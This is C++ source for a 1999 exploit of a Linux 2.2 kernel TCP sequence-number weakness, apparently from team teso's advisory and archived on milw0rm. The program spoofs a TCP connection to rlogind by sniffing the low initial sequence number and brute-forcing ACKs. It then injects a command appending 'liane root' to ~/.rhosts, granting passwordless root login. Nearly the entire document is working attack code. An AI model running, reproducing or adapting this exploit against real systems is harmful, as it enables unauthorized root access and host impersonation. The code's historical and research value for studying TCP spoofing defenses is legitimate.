/** *** Exploit for the 2.2 linux-kernel TCP/IP weakness. *** (C) 1999 by S. Krahmer. *** THERE IS ABSOLUTELY NO WARRANTY. YOU USE IT AT YOUR OWN RSIK! *** THIS PROGRAM IS LICESED UNDER THE GPL and belongs to a security- *** advisory of team teso. You should get the full advisory with paper *** on either *** http://www.cs.uni-potsdam.de/homepages/students/linuxer or *** http://teso.scene.at *** *** The bugdiscovery and the exploit is due to: *** *** Stealth http://www.kalug.lug.net/stealth *** S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linxuer *** *** c++ blindSpoof.cc -lusi++ -lpcap (this is LINUX source!) *** Libusi++ is available on my homepage. *** Achtung: Gehen Sie nicht in den 100 Meilen tiefen Wald! ;-) **/ #include <stdio.h> #include <iostream> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <signal.h> #include <usi++/usi++.h> #define XPORT 513 // may be changed, my best results were around 2000, // but also diffs of > 5000 can happen :) // change it it really not works #define MAXPACK 3000 // define this if you want to exploit rlogind // if not, you will just spoof a connection to XPORT #define EXPLOIT_RLOGIND // uses eth0 for packet-capturing! TCP *pingVictum(char *, char *, char *); int printInfo(TCP *); bool wrongPacket(TCP *, TCP *); int main(int argc, char **argv) { // yes, script-kidz! this is hardcoded to prevent you from usage. const char *remoteUser = "stealth", *localUser = "stealth", *command = "echo liane root>>~/.rhosts\n"; char sbuf[1000]; if (argc < 4) { printf("Usage %s [destination-IP] [source-IP] [spoofed-IP]\n", argv[0]); exit(1); } cout<<"blindSpoof-exploit by S. Krahmer\n" "http://www.cs.uni-potsdam.de/homepages/students/linuxer\n\n"; // would be connect() TCP *conn = pingVictum(argv[1], argv[2], argv[3]); #ifdef EXPLOIT_RLOGIND conn->set_flags(0); sprintf(sbuf, "\0"); conn->sendpack(sbuf, 1); sleep(1); cout<<"Sending local username: "<<localUser<<endl; // send local username conn->set_seq(conn->get_seq() + 1); memset(sbuf, 0, 1000); snprintf(sbuf, sizeof(sbuf), "%s\0", localUser); conn->sendpack(sbuf, strlen(sbuf) + 1); // we don't know about the lag, so i hope that 7 in sec. // the victum has sent an ACK sleep(7); cout<<"Sending remote username: "<<remoteUser<<endl; // send remote username conn->set_seq(conn->get_seq() + strlen(sbuf) + 1); memset(sbuf, 0, sizeof(sbuf)); snprintf(sbuf, sizeof(sbuf), "%s\0", remoteUser); conn->sendpack(sbuf, strlen(sbuf) + 1); sleep(7); cout<<"Sending terminal-type and speed.\n"; conn->set_seq(conn->get_seq() + strlen(sbuf) + 1); memset(sbuf, 0, sizeof(sbuf)); snprintf(sbuf, sizeof(sbuf), "%s\0", "linux/38400"); conn->sendpack(sbuf, strlen(sbuf) + 1); sleep(7); cout<<"Sending command: "<<command<<endl; conn->set_seq(conn->get_seq() + strlen(sbuf) + 1); memset(sbuf, 0, sizeof(sbuf)); snprintf(sbuf, sizeof(sbuf), "%s\0", command); conn->sendpack(sbuf, strlen(sbuf) + 1); #else cout<<"Connection to port "<<XPORT<<" should be established.\n"; #endif delete conn; return 0; } /* Spoof a connection. */ TCP *pingVictum(char *host, char *src, char *spoofed) { char buf[100]; TCP *victumLow = new TCP(host), *victumSpoofed = new TCP(host), *sn = new TCP(host); int myISN = rand(), sport = 512 + rand()%512; sn->init_device("eth0", 1, 500); victumLow->set_flags(TH_SYN); victumLow->set_dstport(XPORT); // rlogin victumLow->set_srcport(sport); // from a privileged port victumLow->set_src(src); victumLow->set_seq(myISN); victumSpoofed->set_flags(TH_SYN); victumSpoofed->set_dstport(XPORT); victumSpoofed->set_srcport(sport); victumSpoofed->set_src(spoofed); victumSpoofed->set_seq(myISN); // we must save the ISN // send SYN to get low end of ISN victumLow->sendpack(""); // send spoofed SYN victumSpoofed->sendpack(""); cout<<"Using sourceport "<<victumSpoofed->get_srcport()<<endl; // wait for SYN/ACK of low packet while (wrongPacket(sn, victumLow)) { sn->sniffpack(buf, 100); printf("%s:%d -> %s:%d ", sn->get_src(1), sn->get_srcport(), sn->get_dst(1), sn->get_dstport()); printInfo(sn); } int lowISN = sn->get_seq(); sleep(2); // NOTE! Even if we sent the SYN before the spoofed SYN, the // spoofed SYN can arrive first, due to routing reasons. // Althought this is NOT very likely, we have to keep it in mind. cout<<"Low end: "<<(unsigned)lowISN<<"\n"; victumSpoofed->set_flags(TH_ACK); victumSpoofed->set_seq(myISN + 1); // for (int i = lowISN; i < lowISN + MAXPACK; i++) { victumSpoofed->set_ack(i); victumSpoofed->sendpack(""); printf("%u\r", i); fflush(stdout); // maybe you have to place a usleep() here, depends on // your devices } cout<<endl; delete sn; delete victumLow; // from now, the connection should be established! return victumSpoofed; } // give out some infos about the received packet int printInfo(TCP* r) { cout<<"[flags: "; if (r->get_flags() & TH_FIN) cout<<"FIN "; if (r->get_flags() & TH_SYN) cout<<"SYN "; if (r->get_flags() & TH_RST) cout<<"RST "; if (r->get_flags() & TH_PUSH) cout<<"PUSH "; if (r->get_flags() & TH_ACK) cout<<"ACK "; if (r->get_flags() & TH_URG) cout<<"URG "; cout<<"] [ACK: "<<r->get_ack()<<"] [SEQ: "<<r->get_seq()<<"]"<<endl; return 0; } /* returns true is packet is WRONG */ bool wrongPacket(TCP *p1, TCP *p2) { if (p1->get_src() != p2->get_dst()) return true; if (p1->get_dst() != p2->get_src()) return true; if (p1->get_dstport() != p2->get_srcport()) return true; if (p1->get_srcport() != p2->get_dstport()) return true; if (p1->get_ack() != (p2->get_seq() + 1)) return true; return false; } // milw0rm.com [2001-01-02]